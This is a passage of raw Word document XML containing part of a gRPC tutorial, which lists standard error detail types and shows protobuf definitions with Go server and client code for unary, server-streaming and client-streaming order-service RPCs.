    <w:p w14:paraId="7B1B2F90" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFCAAE3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64349ECE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BD2498" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6031BA4D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC50911" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Standard error detail types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F9BD00" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    ErrorInfo:          error domain, reason, metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D46B29" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    RetryInfo:          when to retry (retry_delay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1FECA6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    DebugInfo:          stack trace, request debug info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C64D3D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    QuotaFailure:       which quota was exceeded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238DC1BA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    PreconditionFailure: which preconditions failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104DC8A0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    BadRequest:         which fields were invalid (field_violations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1316639E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    RequestInfo:        request_id for support reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF84E6F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    ResourceInfo:       which resource was not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE5CE58" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Help:               links to documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5729CD86" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    LocalizedMessage:   error message in user's locale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BE796C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Four Communication Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B452C15" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pattern 1: Unary RPC (request-response):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B8E13E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA5E988" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>rpc GetOrder(GetOrderRequest) returns (Order);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FCD05C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D23DFA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Server implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A07084" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>func (s *OrderServer) GetOrder(ctx context.Context, req *v1.GetOrderRequest) (*v1.Order, error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040969D9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    // Context carries: deadline, cancellation, metadata (auth, tracing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782E60E7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    if req.OrderId == "" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26486B2A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        return nil, status.Error(codes.InvalidArgument, "order_id is required")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4343FDCE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226C8F9F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CE7AB0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    order, err := s.db.GetOrder(ctx, req.OrderId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4145870E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235B0B1D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        if errors.Is(err, ErrNotFound) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C62801" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            return nil, status.Errorf(codes.NotFound, "order %s not found", req.OrderId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF9B1B7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48237CFE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        return nil, status.Errorf(codes.Internal, "failed to get order: %v", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147EE901" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BD7ED6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B7CFC6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    return toProto(order), nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AADEAE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732DADDF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="3A743D19" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Client usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1858AFF1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>conn, err := grpc.Dial("api.example.com:443",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D626B72" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpc.WithTransportCredentials(credentials.NewClientTLSFromCert(nil, "")),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C0C569" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpc.WithDefaultCallOptions(grpc.WaitForReady(true)),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7562348B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5386ABCF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>client := v1.NewOrderServiceClient(conn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707A1304" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="16387319" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA43644" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>defer cancel()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC27A50" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="5BDB1DF6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>order, err := client.GetOrder(ctx, &amp;v1.GetOrderRequest{OrderId: "ord_123"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00194A7A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Pattern 2: Server-Streaming RPC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654AD135" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0248C283" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>rpc ListOrders(ListOrdersRequest) returns (stream Order);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5ADE0D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050576FD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Server: sends multiple responses to one request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB27F5C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>func (s *OrderServer) ListOrders(req *v1.ListOrdersRequest, stream v1.OrderService_ListOrdersServer) error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CCAFC9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    ctx := stream.Context()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8070CF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00749749" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    cursor := req.PageToken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DC7615" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    for {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAABDB4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        // Check if client cancelled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303C589A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        select {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161FE29A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        case &lt;-ctx.Done():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6044F730" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            return ctx.Err()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CBC856" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        default:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D16FF2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C0758C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6A6582" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        orders, nextCursor, err := s.db.ListOrders(ctx, req.UserId, cursor, 50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC50A6A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652D4458" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            return status.Errorf(codes.Internal, "failed to list orders: %v", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A3DAE2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D10CDB1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AFE4FB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        for _, order := range orders {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF03764" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            if err := stream.Send(toProto(order)); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7089D8BB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                return err  // client disconnected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734C833A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59534DAB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD76DDD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429EA1D5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        if nextCursor == "" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB34D9B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            return nil  // no more pages, close stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB51C5C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0DC239" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        cursor = nextCursor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E0E584" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED1C681" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B91CA1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="488C1731" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Client: receives stream of responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41629050" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>stream, err := client.ListOrders(ctx, &amp;v1.ListOrdersRequest{UserId: "usr_123"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D471AE9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>for {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE05249" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    order, err := stream.Recv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C174E3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    if err == io.EOF {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AE1569" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        break  // server closed stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38783B08" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777D6C3B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AE1AD5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        log.Fatalf("error receiving: %v", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F48198C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C08E43A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    processOrder(order)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C287323" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D5FF79" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pattern 3: Client-Streaming RPC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB6A53D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEDFEA8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>rpc BatchCreateOrders(stream CreateOrderRequest) returns (BatchCreateResponse);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544F69A4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0594A707" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>// Client: sends multiple requests, server responds once</w:t>
      </w:r>
